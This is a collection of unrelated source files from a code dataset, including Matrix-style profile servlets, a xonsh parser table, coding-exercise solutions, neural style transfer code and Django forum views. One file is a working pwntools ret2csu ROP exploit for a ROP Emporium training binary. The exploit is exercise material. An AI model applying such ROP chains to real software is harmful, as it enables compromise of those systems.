content = parse_json_object_from_request(request)
try:
new_dob = content["dob"]
except Exception:
defer.returnValue((400, "Unable to parse dob"))
yield self.profile_handler.set_dob(
user, requester, new_dob, is_admin)
defer.returnValue((200, {}))
def on_OPTIONS(self, request, user_id):
return (200, {})
#---------------------------------------------------------------
class ProfileAvatarURLRestServlet(ClientV1RestServlet):
PATTERNS = client_path_patterns("/profile/(?P<user_id>[^/]*)/avatar_url")
def __init__(self, hs):
super(ProfileAvatarURLRestServlet, self).__init__(hs)
self.profile_handler = hs.get_profile_handler()
@defer.inlineCallbacks
def on_GET(self, request, user_id):
user = UserID.from_string(user_id)
avatar_url = yield self.profile_handler.get_avatar_url(
user,
)
ret = {}
if avatar_url is not None:
ret["avatar_url"] = avatar_url
defer.returnValue((200, ret))
@defer.inlineCallbacks
def on_PUT(self, request, user_id):
requester = yield self.auth.get_user_by_req(request)
user = UserID.from_string(user_id)
is_admin = yield self.auth.is_server_admin(requester.user)
content = parse_json_object_from_request(request)
try:
new_name = content["avatar_url"]
except Exception:
defer.returnValue((400, "Unable to parse name"))
yield self.profile_handler.set_avatar_url(
user, requester, new_name, is_admin)
defer.returnValue((200, {}))
def on_OPTIONS(self, request, user_id):
return (200, {})
## Added by me
"""
class GroupAvatarURLRestServlet(ClientV1RestServlet):
PATTERNS = client_path_patterns("/profile/(?P<room_id>[^/]*)/room_icon_url")
def __init__(self, hs):
super(GroupAvatarURLRestServlet, self).__init__(hs)
self.profile_handler = hs.get_profile_handler()
@defer.inlineCallbacks
def on_GET(self, request, room_id):
room = RoomID.from_string(room_id)
avatar_url = yield self.profile_handler.get_room_avatar_url(
room,
)
ret = {}
if avatar_url is not None:
ret["room_icon_url"] = avatar_url
defer.returnValue((200, ret))
@defer.inlineCallbacks
def on_PUT(self, request, room_id):
requester = yield self.auth.get_user_by_req(request)
room = RoomID.from_string(room_id)
is_admin = yield self.auth.is_server_admin(requester.user)
content = parse_json_object_from_request(request)
new_avatar_url = content["group_avatar_url"];
try:
new_name = content["room_icon_url"]
except Exception:
defer.returnValue((400, "Unable to parse name"))
yield self.profile_handler.set_room_avatar_url(
room, requester, new_avatar_url, is_admin)
defer.returnValue((200, {}))
def on_OPTIONS(self, request, user_id):
return (200, {})
##--------------------
"""
class ProfileRestServlet(ClientV1RestServlet):
PATTERNS = client_path_patterns("/profile/(?P<user_id>[^/]*)")
def __init__(self, hs):
super(ProfileRestServlet, self).__init__(hs)
self.profile_handler = hs.get_profile_handler()
@defer.inlineCallbacks
def on_GET(self, request, user_id):
user = UserID.from_string(user_id)
displayname = yield self.profile_handler.get_displayname(
user,
)
avatar_url = yield self.profile_handler.get_avatar_url(
user,
)
dob = yield self.profile_handler.get_dob(
user,
)
ret = {}
if displayname is not None:
ret["displayname"] = displayname
if avatar_url is not None:
ret["avatar_url"] = avatar_url
if dob is not None:
ret["dob"]=dob
defer.returnValue((200, ret))
def register_servlets(hs, http_server):
ProfileDisplaynameRestServlet(hs).register(http_server)
ProfileAvatarURLRestServlet(hs).register(http_server)
ProfileRestServlet(hs).register(http_server)
| [
"[email protected]"
] | |
b3410046e6683bae3734e6383a0fea492bc46cbb | 3cefe15ca5f86c8ee805074200e73036e032c4da | /xonsh/completion_parser_table.py | 2175c647fefc98891803626c904bb93f259dba36 | [
"BSD-2-Clause"
] | permissive | ryanhuanli/xonsh | 3a61e447521e144471d3e76b893478a9fcfd0f92 | 1845fa007cb8f3ecb02a4fb17c15a44f11ebe6a3 | refs/heads/main | 2023-05-09T16:26:19.147372 | 2021-06-15T04:31:12 | 2021-06-15T04:31:12 | 375,830,694 | 0 | 0 | NOASSERTION | 2021-06-10T21:07:35 | 2021-06-10T21:07:34 | null | UTF-8 | Python | false | false | 9,170 | py |
# completion_parser_table.py
# This file is automatically generated. Do not edit.
# pylint: disable=W,C,R
_tabversion = '3.10'
_lr_method = 'LALR'
_lr_signature = 'AND ANY ATDOLLAR_LPAREN AT_LPAREN BANG_LBRACKET BANG_LPAREN DOLLAR_LBRACKET DOLLAR_LPAREN NEWLINE OR PIPE RBRACKET RPAREN SEMI STRINGcontext : command\n | commands\n command : args\n |\n commands : commandcommands : commands PIPE command\n\t| commands NEWLINE command\n\t| commands OR command\n\t| commands SEMI command\n\t| commands AND commandsub_expression : DOLLAR_LPAREN commands RPAREN\n\t| BANG_LPAREN commands RPAREN\n\t| ATDOLLAR_LPAREN commands RPAREN\n\t| DOLLAR_LBRACKET commands RBRACKET\n\t| BANG_LBRACKET commands RBRACKET\n\t| AT_LPAREN commands RPAREN\n | DOLLAR_LPAREN commands\n\t| BANG_LPAREN commands\n\t| ATDOLLAR_LPAREN commands\n\t| DOLLAR_LBRACKET commands\n\t| BANG_LBRACKET commands\n\t| AT_LPAREN commands\n arg : sub_expressionarg : DOLLAR_LPAREN\n\t| STRING\n\t| BANG_LPAREN\n\t| DOLLAR_LBRACKET\n\t| BANG_LBRACKET\n\t| ATDOLLAR_LPAREN\n\t| ANY\n\t| AT_LPARENargs : argargs : args arg'
_lr_action_items = {'$end':([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[-4,0,-1,-2,-3,-32,-23,-4,-25,-4,-4,-4,-4,-30,-4,-4,-4,-4,-4,-4,-33,-17,-5,-18,-20,-21,-19,-22,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'PIPE':([0,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[-4,-5,15,-3,-32,-23,-4,-25,-4,-4,-4,-4,-30,-4,-4,-4,-4,-4,-4,-33,15,-5,15,15,15,15,15,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'NEWLINE':([0,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[-4,-5,16,-3,-32,-23,-4,-25,-4,-4,-4,-4,-30,-4,-4,-4,-4,-4,-4,-33,16,-5,16,16,16,16,16,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'OR':([0,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[-4,-5,17,-3,-32,-23,-4,-25,-4,-4,-4,-4,-30,-4,-4,-4,-4,-4,-4,-33,17,-5,17,17,17,17,17,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'SEMI':([0,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[-4,-5,18,-3,-32,-23,-4,-25,-4,-4,-4,-4,-30,-4,-4,-4,-4,-4,-4,-33,18,-5,18,18,18,18,18,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'AND':([0,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[-4,-5,19,-3,-32,-23,-4,-25,-4,-4,-4,-4,-30,-4,-4,-4,-4,-4,-4,-33,19,-5,19,19,19,19,19,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'DOLLAR_LPAREN':([0,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[7,7,-32,-23,7,-25,7,7,7,7,-30,7,7,7,7,7,7,-33,-17,-5,-18,-20,-21,-19,-22,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'STRING':([0,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[8,8,-32,-23,8,-25,8,8,8,8,-30,8,8,8,8,8,8,-33,-17,-5,-18,-20,-21,-19,-22,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'BANG_LPAREN':([0,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[9,9,-32,-23,9,-25,9,9,9,9,-30,9,9,9,9,9,9,-33,-17,-5,-18,-20,-21,-19,-22,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'DOLLAR_LBRACKET':([0,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[10,10,-32,-23,10,-25,10,10,10,10,-30,10,10,10,10,10,10,-33,-17,-5,-18,-20,-21,-19,-22,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'BANG_LBRACKET':([0,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[11,11,-32,-23,11,-25,11,11,11,11,-30,11,11,11,11,11,11,-33,-17,-5,-18,-20,-21,-19,-22,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'ATDOLLAR_LPAREN':([0,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[12,12,-32,-23,12,-25,12,12,12,12,-30,12,12,12,12,12,12,-33,-17,-5,-18,-20,-21,-19,-22,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'ANY':([0,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[13,13,-32,-23,13,-25,13,13,13,13,-30,13,13,13,13,13,13,-33,-17,-5,-18,-20,-21,-19,-22,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'AT_LPAREN':([0,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[14,14,-32,-23,14,-25,14,14,14,14,-30,14,14,14,14,14,14,-33,-17,-5,-18,-20,-21,-19,-22,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'RPAREN':([4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[-3,-32,-23,-4,-25,-4,-4,-4,-4,-30,-4,-4,-4,-4,-4,-4,-33,33,-5,34,-20,-21,37,38,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),'RBRACKET':([4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,],[-3,-32,-23,-4,-25,-4,-4,-4,-4,-30,-4,-4,-4,-4,-4,-4,-33,-17,-5,-18,35,36,-19,-22,-6,-7,-8,-9,-10,-11,-12,-14,-15,-13,-16,]),}
_lr_action = {}
for _k, _v in _lr_action_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_action: _lr_action[_x] = {}
_lr_action[_x][_k] = _y
del _lr_action_items
_lr_goto_items = {'context':([0,],[1,]),'command':([0,7,9,10,11,12,14,15,16,17,18,19,],[2,22,22,22,22,22,22,28,29,30,31,32,]),'commands':([0,7,9,10,11,12,14,],[3,21,23,24,25,26,27,]),'args':([0,7,9,10,11,12,14,15,16,17,18,19,],[4,4,4,4,4,4,4,4,4,4,4,4,]),'arg':([0,4,7,9,10,11,12,14,15,16,17,18,19,],[5,20,5,5,5,5,5,5,5,5,5,5,5,]),'sub_expression':([0,4,7,9,10,11,12,14,15,16,17,18,19,],[6,6,6,6,6,6,6,6,6,6,6,6,6,]),}
_lr_goto = {}
for _k, _v in _lr_goto_items.items():
for _x, _y in zip(_v[0], _v[1]):
if not _x in _lr_goto: _lr_goto[_x] = {}
_lr_goto[_x][_k] = _y
del _lr_goto_items
_lr_productions = [
("S' -> context","S'",1,None,None,None),
('context -> command','context',1,'p_context_command','completion_context.py',463),
('context -> commands','context',1,'p_context_command','completion_context.py',464),
('command -> args','command',1,'p_command','completion_context.py',504),
('command -> <empty>','command',0,'p_command','completion_context.py',505),
('commands -> command','commands',1,'p_multiple_commands_first','completion_context.py',543),
('commands -> commands PIPE command','commands',3,'p_multiple_commands_many','completion_context.py',553),
('commands -> commands NEWLINE command','commands',3,'p_multiple_commands_many','completion_context.py',554),
('commands -> commands OR command','commands',3,'p_multiple_commands_many','completion_context.py',555),
('commands -> commands SEMI command','commands',3,'p_multiple_commands_many','completion_context.py',556),
('commands -> commands AND command','commands',3,'p_multiple_commands_many','completion_context.py',557),
('sub_expression -> DOLLAR_LPAREN commands RPAREN','sub_expression',3,'p_sub_expression','completion_context.py',586),
('sub_expression -> BANG_LPAREN commands RPAREN','sub_expression',3,'p_sub_expression','completion_context.py',587),
('sub_expression -> ATDOLLAR_LPAREN commands RPAREN','sub_expression',3,'p_sub_expression','completion_context.py',588),
('sub_expression -> DOLLAR_LBRACKET commands RBRACKET','sub_expression',3,'p_sub_expression','completion_context.py',589),
('sub_expression -> BANG_LBRACKET commands RBRACKET','sub_expression',3,'p_sub_expression','completion_context.py',590),
('sub_expression -> AT_LPAREN commands RPAREN','sub_expression',3,'p_sub_expression','completion_context.py',591),
('sub_expression -> DOLLAR_LPAREN commands','sub_expression',2,'p_sub_expression','completion_context.py',592),
('sub_expression -> BANG_LPAREN commands','sub_expression',2,'p_sub_expression','completion_context.py',593),
('sub_expression -> ATDOLLAR_LPAREN commands','sub_expression',2,'p_sub_expression','completion_context.py',594),
('sub_expression -> DOLLAR_LBRACKET commands','sub_expression',2,'p_sub_expression','completion_context.py',595),
('sub_expression -> BANG_LBRACKET commands','sub_expression',2,'p_sub_expression','completion_context.py',596),
('sub_expression -> AT_LPAREN commands','sub_expression',2,'p_sub_expression','completion_context.py',597),
('arg -> sub_expression','arg',1,'p_sub_expression_arg','completion_context.py',666),
('arg -> DOLLAR_LPAREN','arg',1,'p_any_token_arg','completion_context.py',670),
('arg -> STRING','arg',1,'p_any_token_arg','completion_context.py',671),
('arg -> BANG_LPAREN','arg',1,'p_any_token_arg','completion_context.py',672),
('arg -> DOLLAR_LBRACKET','arg',1,'p_any_token_arg','completion_context.py',673),
('arg -> BANG_LBRACKET','arg',1,'p_any_token_arg','completion_context.py',674),
('arg -> ATDOLLAR_LPAREN','arg',1,'p_any_token_arg','completion_context.py',675),
('arg -> ANY','arg',1,'p_any_token_arg','completion_context.py',676),
('arg -> AT_LPAREN','arg',1,'p_any_token_arg','completion_context.py',677),
('args -> arg','args',1,'p_args_first','completion_context.py',688),
('args -> args arg','args',2,'p_args_many','completion_context.py',693),
]
| [
"[email protected]"
] | |
00809145f82c17507b7b70177cd32aff00ea4b01 | bd3c44a811a270e81c5b1d48e0f0172f3ab90054 | /simple_functions.py | 957667ebf53c0267f4f88660bbdf309d5b9de187 | [] | no_license | ycai01/open_source_proj | 6816e3eb49525f6218d0c7be299e4d09ed224617 | 342f459eaf03992711358bb3166870dfbf76635c | refs/heads/master | 2023-03-23T09:46:20.578910 | 2021-03-21T22:10:14 | 2021-03-21T22:10:14 | 350,093,881 | 0 | 1 | null | 2021-03-21T22:48:58 | 2021-03-21T19:08:53 | Python | UTF-8 | Python | false | false | 70 | py | def main():
print("Hello")
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
893f3e005d90c7bf5010bd6b58490fe895f6c0cc | a0a7a6e62daa59a819665482f8b48b19fcb93d4d | /leetcode_415.py | a1a1dd875479afa9f5300664e1172e3fc0fe8368 | [] | no_license | boboalex/LeetcodeExercise | 1934bc190c7dda55e0e5a9ff6a7523535186fb75 | c29d217605cfcc8294855e3948acf744c941bf27 | refs/heads/master | 2023-04-19T10:13:30.261039 | 2021-04-23T06:33:38 | 2021-04-23T06:37:35 | 360,785,919 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 594 | py | class Solution:
def addStrings(self, num1: str, num2: str) -> str:
i, j = len(num1) - 1, len(num2) - 1
carry = 0
res = ""
while i >= 0 or j >= 0:
a = int(num1[i]) if i >= 0 else 0
b = int(num2[j]) if j >= 0 else 0
sum = a + b + carry
res = str(sum % 10) + res
carry = 1 if sum > 9 else 0
i -= 1
j -= 1
if carry == 1:
res = "1" + res
return res
if __name__ == '__main__':
s = Solution()
res = s.addStrings("96043", "5582")
print(res) | [
"[email protected]"
] | |
58ed71a22e4d7afc540b77b127a637084478af10 | a481439449a1f299f22eeeb384ad1a542ac3280f | /app/__init__.py | bed4e90c71a19966fa7a18fe2322716ab0fa1774 | [] | no_license | FranH20/EmpresasTacna | 945bc20aa9a6ff34ab2ee3d23234607015f2d752 | d1916dbe81577a6e77e5ef4e4d27f74f9eab6a8d | refs/heads/master | 2023-07-18T01:57:06.044866 | 2021-08-24T23:43:55 | 2021-08-24T23:43:55 | 397,488,761 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 159 | py | from flask import Flask, app
from .config import MONGO_URI
def create_app():
app = Flask(__name__)
app.config["MONGO_URI"] = MONGO_URI
return app
| [
"[email protected]"
] | |
4149b8e5289cf89b858d9f0f30c0cbccdc5efe87 | 8364e4d23191ee535c163debffafa8418d705843 | /test/test_v1_endpoint_port.py | 691643b0d17b6094b4f7d7bd22cac4482b2aa588 | [
"Apache-2.0"
] | permissive | olitheolix/aiokubernetes | 2bb6499030e2e6e9b7ca0db63c4441293d70a09b | 266718b210dff2a9b2212183261ea89adf89115e | refs/heads/master | 2020-03-21T23:02:30.484410 | 2018-10-20T19:33:01 | 2018-10-22T05:52:42 | 139,162,905 | 28 | 3 | Apache-2.0 | 2018-10-22T05:52:51 | 2018-06-29T15:02:59 | Python | UTF-8 | Python | false | false | 932 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v1.10.6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import aiokubernetes
from aiokubernetes.models.v1_endpoint_port import V1EndpointPort # noqa: E501
from aiokubernetes.rest import ApiException
class TestV1EndpointPort(unittest.TestCase):
"""V1EndpointPort unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testV1EndpointPort(self):
"""Test V1EndpointPort"""
# FIXME: construct object with mandatory attributes with example values
# model = aiokubernetes.models.v1_endpoint_port.V1EndpointPort() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
7e908057e33cd135999895049c04d6dabc1c721c | 91b0b09d2c05e44f40e570a6323801d1f41bc60a | /graphs/largest_distance_between_nodes.py | 5bfaf511a46532c5d5d932c0a0f0297801d5faa3 | [] | no_license | shiveshsky/datastructures | 170243edbdaf1b206713bd3b53a029f32063d4ce | 22fb94983846c4e7906a22f91ef7c0886c74a6b6 | refs/heads/master | 2021-05-21T16:46:43.852404 | 2020-07-17T02:29:48 | 2020-07-17T02:29:48 | 252,722,499 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,127 | py | import heapq
class Solution:
# @param A : list of integers
# @return an integer
def solve(self, A):
children = {}
root = None
for i, x in enumerate(A):
if x == -1:
root = i
else:
if x in children:
children[x] += [i]
else:
children[x] = [i]
largest_dist = 0
for k, v in self.dfs(root, children, 0, {}).items():
largest_dist = max(self.largest_dist_from_paths(v), largest_dist)
return largest_dist
def largest_dist_from_paths(self, paths):
paths += [0, 0]
a, b = heapq.heappop(paths), heapq.heappop(paths)
return -1 * (a + b)
def dfs(self, root, children, path_len, paths):
paths[root] = [0]
if root not in children: return paths
for child in children[root]:
paths = self.dfs(child, children, path_len + 1, paths)
heapq.heappush(paths[root], min(paths[child]) - 1)
return paths
if __name__ == '__main__':
print(Solution().solve([-1, 0, 0]))
| [
"[email protected]"
] | |
f3bd71eae8ad16a999273e80931b3fa668954546 | 9785b5c8b997bc0241e8520b77bc7078d4c29029 | /wargames/ropemporium/x64/ret2csu/exp.py | 2bb340a347e37a7b64c6c89e4027cfb4510717dc | [] | no_license | lucyoa/ctfs | 4619571201bece8d7a6545f0cdc8291c153b6ef2 | 0726ee26052eabc5ee854fd976d0905d40668e8d | refs/heads/master | 2020-07-31T01:49:00.736206 | 2020-06-25T19:46:53 | 2020-06-25T19:46:53 | 210,439,562 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 767 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
exe = context.binary = ELF('./ret2csu')
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
gdbscript = '''
tbreak main
continue
'''.format(**locals())
# -- Exploit goes here --
io = start()
io.recvuntil("> ")
payload = (
b"A" * 40 +
p64(0x40089a) +
p64(0x0) + # rbx
p64(0x1) + # rbp
p64(0x600e38) + # r12
p64(0x41) + # r13
p64(0x41) + # r14
p64(0xdeadcafebabebeef) + # r15
p64(0x400880) +
p64(0x0) * 7 +
p64(exe.sym.ret2win)
)
io.sendline(payload)
io.interactive()
| [
"[email protected]"
] | |
4e44d40a6908298df40e0b8a96bd8682f578f45c | 76f996b26221344213c099db096c60316f9b45c2 | /supervised_learning/0x0C-neural_style_transfer/5-neural_style.py | 7e7339795a277b66a18f783374aa45da1838e270 | [] | no_license | Nzparra/holbertonschool-machine_learning | 8c61e40c3a6471d52bdf2bbcf4e7ae3c029d3c8b | 9ff78818c132d1233c11b8fc8fd469878b23b14e | refs/heads/master | 2023-04-06T10:48:01.263608 | 2021-04-20T17:34:33 | 2021-04-20T17:34:33 | 279,482,215 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,709 | py | #!/usr/bin/env python3
"""contains the NST class"""
import numpy as np
import tensorflow as tf
class NST:
"""
NST class performs tasks for neural style transfer
"""
style_layers = ['block1_conv1', 'block2_conv1',
'block3_conv1', 'block4_conv1', 'block5_conv1']
content_layer = 'block5_conv2'
def __init__(self, style_image, content_image, alpha=1e4, beta=1):
"""
constructor
:param style_image: image used as a style reference,
stored as a numpy.ndarray
:param content_image: image used as a content reference,
stored as a numpy.ndarray
:param alpha:
:param beta: weight for style cost
"""
if type(style_image) is not np.ndarray \
or len(style_image.shape) != 3 \
or style_image.shape[2] != 3:
msg = 'style_image must be a numpy.ndarray with shape (h, w, 3)'
raise TypeError(msg)
if type(content_image) is not np.ndarray \
or len(content_image.shape) != 3 \
or content_image.shape[2] != 3:
msg = 'content_image must be a numpy.ndarray with shape (h, w, 3)'
raise TypeError(msg)
if not isinstance(alpha, (int, float)) or alpha < 0:
msg = 'alpha must be a non-negative number'
raise TypeError(msg)
if not isinstance(beta, (int, float)) or beta < 0:
msg = 'beta must be a non-negative number'
raise TypeError(msg)
tf.enable_eager_execution()
self.style_image = self.scale_image(style_image)
self.content_image = self.scale_image(content_image)
self.alpha = alpha
self.beta = beta
self.load_model()
self.generate_features()
@staticmethod
def scale_image(image):
"""
:param image: numpy.ndarray of shape (h, w, 3)
containing the image to be scaled
:return:
"""
if type(image) is not np.ndarray \
or len(image.shape) != 3 \
or image.shape[2] != 3:
msg = 'image must be a numpy.ndarray with shape (h, w, 3)'
raise TypeError(msg)
h, w, c = image.shape
if w > h:
w_new = 512
h_new = int(h * 512 / w)
else:
h_new = 512
w_new = int(w * 512 / h)
dim = (h_new, w_new)
image = image[tf.newaxis, ...]
image = tf.image.resize_bicubic(image, dim, align_corners=False)
image = tf.math.divide(image, 255)
image = tf.clip_by_value(image, clip_value_min=0, clip_value_max=1)
return image
def load_model(self):
""" loads the model for neural style transfer """
vgg_pre = tf.keras.applications.vgg19.VGG19(include_top=False,
weights='imagenet')
custom_objects = {'MaxPooling2D': tf.keras.layers.AveragePooling2D}
vgg_pre.save("base_model")
vgg = tf.keras.models.load_model("base_model",
custom_objects=custom_objects)
for layer in vgg.layers:
layer.trainable = False
style_outputs = \
[vgg.get_layer(name).output for name in self.style_layers]
content_outputs = vgg.get_layer(self.content_layer).output
model_outputs = style_outputs + [content_outputs]
self.model = tf.keras.models.Model(vgg.input, model_outputs)
@staticmethod
def gram_matrix(input_layer):
"""
:param input_layer: an instance of tf.Tensor or
tf.Variable of shape (1, h, w, c)containing the
layer output whose gram matrix should be calculated
:return:
"""
e = 'input_layer must be a tensor of rank 4'
if not isinstance(input_layer, (tf.Tensor, tf.Variable)) \
or len(input_layer.shape) != 4:
raise TypeError(e)
channels = int(input_layer.shape[-1])
a = tf.reshape(input_layer, [-1, channels])
n = tf.shape(a)[0]
gram = tf.matmul(a, a, transpose_a=True)
gram = tf.expand_dims(gram, axis=0)
return gram / tf.cast(n, tf.float32)
def generate_features(self):
""" extracts the features used to calculate neural style cost"""
vgg19 = tf.keras.applications.vgg19
content_image_input = vgg19.preprocess_input(self.content_image * 255)
style_image_input = vgg19.preprocess_input(self.style_image * 255)
content_img_output = self.model(content_image_input)
style_img_output = self.model(style_image_input)
list_gram = []
for out in style_img_output[:-1]:
list_gram = list_gram + [self.gram_matrix(out)]
self.gram_style_features = list_gram
self.content_feature = content_img_output[-1]
def layer_style_cost(self, style_output, gram_target):
"""
:param style_output: tf.Tensor of shape (1, h, w, c)
containing the layer style output of the generated image
:param gram_target: tf.Tensor of shape (1, c, c)
the gram matrix of the target style output for that layer
:return:
"""
err = 'style_output must be a tensor of rank 4'
if (not isinstance(style_output, (tf.Tensor, tf.Variable)) or
len(style_output.shape) != 4):
raise TypeError(err)
c = int(style_output.shape[-1])
err = 'gram_target must be a tensor of shape [1, {}, {}]'.format(c, c)
if (not isinstance(gram_target, (tf.Tensor, tf.Variable)) or
gram_target.shape != (1, c, c)):
raise TypeError(err)
gram_style = self.gram_matrix(style_output)
return tf.reduce_mean(tf.square(gram_style - gram_target))
def style_cost(self, style_outputs):
"""
calculate the style cost:
:param style_outputs: list of tf.Tensor style outputs
for the generated image
:return: style cost
"""
my_length = len(self.style_layers)
err = \
'style_outputs must be a list with a length of {}'. \
format(my_length)
if (not type(style_outputs) is list
or len(self.style_layers) != len(style_outputs)):
raise TypeError(err)
weight = 1.0 / float(my_length)
style_cost = 0.0
for img_style, target_style in \
zip(style_outputs, self.gram_style_features):
layer_cost = self.layer_style_cost(img_style, target_style)
style_cost = style_cost + weight * layer_cost
return style_cost
| [
"[email protected]"
] | |
ba4699fe8998ae1ce46d88e29cc15d35f408be1a | 77139a58311a1c729b0d16f591e695e9d92c3dbd | /gfx.py | 344f361cdef414e3cd10d1a5526816b0ee616192 | [] | no_license | funnybr0ther/python_evolution | 727471f36a53c90e683329345a56dde59e5c653f | d139f3db786fb20f3385218573e44c28295bd8ec | refs/heads/master | 2020-06-11T18:56:16.269804 | 2019-10-15T17:54:22 | 2019-10-15T17:54:22 | 194,053,809 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,317 | py | from numpy import *
import pygame as pg
import os
import sys
def background():
filename=input("Map?")
try:
file=open(os.path.join(sys.path[0], filename), "r")
lines=[]
for line in file:
lines.append(line)
terrainSize=len(lines)
terrain = empty((terrainSize,terrainSize),dtype=int)
for i in range(0,terrainSize):
for j in range(0,terrainSize):
terrain[i][j]=int(lines[i][j])
return terrain,terrainSize
except IOError:
print("File does not exist")
return background()
def draw_bg(terrain,win,terrainSize):
color_map={}
color_map[0] = (255,0,0);color_map[1]=(240,106,16);color_map[2]=(247,255,0);color_map[3]=(68,255,0);color_map[4]=(0,222,255);color_map[5]=(0,0,255)
pg.draw.rect(win,(0,0,0),pg.Rect(0,0,800,800))
for i in range(0,terrainSize):
for j in range(0,terrainSize):
pg.draw.rect(win,color_map[terrain[j][i]],pg.Rect(i*(800/terrainSize),j*(800/terrainSize),800/terrainSize,800/terrainSize))
def draw_food(food_list,win):
for food in food_list:
pg.draw.circle(win,(247,0,255),(food.x,food.y),food.radius)
def draw_zomb(zombie_list,win):
for zomb in zombie_list:
pg.draw.rect(win,(0,0,0),pg.Rect(zomb.x,zomb.y,10,10)) | [
"[email protected]"
] | |
20068a2762fb02a1ceafe32e239741bcab2ae28d | 28b9adc46eb9bb7616c4f74fe29f9a3417f2f963 | /10/SIM_PKL/forum/views.py | 3e95a455633ea9ca9db03dd67f0faa36865d7972 | [] | no_license | mohamad1213/SIMPKL | ca0a6dafb97b494e5edf9276e358f800eee808e1 | e6ef5d6b8a5c18c85067314a3664bf43959a0370 | refs/heads/master | 2023-01-04T18:27:06.306534 | 2020-11-03T06:53:50 | 2020-11-03T06:53:50 | 297,674,434 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,716 | py | from django.shortcuts import render, redirect
from django.contrib.auth.models import User
from mahasiswa.models import Pkl
from . import models, forms
from django.contrib import messages
def index_dosen(req):
tasks = models.Forum.objects.all()
form_input = forms.ForumForm()
if req.POST:
form_input = forms.ForumForm(req.POST, req.FILES)
if form_input.is_valid():
form_input.instance.owner = req.user
form_input.save()
messages.success(req, 'Data telah ditambahkan.')
return redirect('/forumd/')
return render(req, 'forumd/index.html',{
'data': tasks,
'form' : form_input,
})
def index_staf(req):
tasks = models.Forum.objects.all()
form_input = forms.ForumForm()
if req.POST:
form_input = forms.ForumForm(req.POST, req.FILES)
if form_input.is_valid():
form_input.instance.owner = req.user
form_input.save()
messages.success(req, 'Data telah ditambahkan.')
return redirect('/forums/')
return render(req, 'forums/index.html',{
'data': tasks,
'form' : form_input,
})
def index_mhs(req):
forum = req.user.mahasiswa.first().nama_mitra
return redirect(f'/forum/{forum.id}')
def delete_forum(req, id):
models.Forum.objects.filter(pk=id).delete()
messages.success(req, 'data telah di hapus.')
return redirect('/forums/')
def detail_forum(req, id):
